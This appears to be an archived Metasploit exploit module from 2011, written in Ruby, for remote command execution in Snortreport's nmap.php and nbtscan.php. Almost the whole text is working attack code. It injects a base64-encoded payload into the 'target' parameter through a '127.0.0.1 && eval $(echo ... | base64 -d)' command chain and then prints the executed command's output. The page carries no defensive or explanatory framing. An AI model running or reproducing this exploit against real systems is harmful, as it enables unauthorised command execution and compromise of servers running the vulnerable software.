Snortreport nmap.php and nbtscan.php Remote Command Execution
2011-10-10 09:15:20##
# $Id: snortreport_exec.rb 13843 2011-10-09 06:12:54Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Snortreport nmap.php and nbtscan.php Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in
nmap.php and nbtscan.php scripts.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Paul Rascagneres' #itrust consulting during hack.lu 2011
],
'Version' => '$Revision: 13843 $',
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
}
},
'Platform' => ['unix', 'linux'],
'Arch' => ARCH_CMD,
'Targets' => [['Automatic',{}]],
'DisclosureDate' => 'Sep 19 2011',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('URI', [true, "The full URI path to nmap.php or nbtscan.php", "/snortreport-1.3.2/nmap.php"]),
],self.class)
end
def exploit
base64_payload = ""
base64_payload_temp=Base64.encode64(payload.encoded).chomp
base64_payload_temp.each_line do |line|
base64_payload << line.chomp
end
start = "127.0.0.1 && echo XXXXX && eval $(echo "
last = " | base64 -d) && echo ZZZZZ"
custom_payload = start << base64_payload << last
res = send_request_cgi({
'uri' => datastore['URI'],
'vars_get' =>
{
'target' => custom_payload
}
},10)
if (res)
to_print=false
already_print=false
part=res.body.gsub("<BR>","")
part.each_line do |line|
if line =~ /ZZZZZ/
to_print=false
end
if to_print == true
print(line)
end
if line =~ /XXXXX/
already_print=true
to_print=true
end
end
if already_print == false
print_error("This server may not be vulnerable")
end
else
print_error("No response from the server")
end
end
end
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.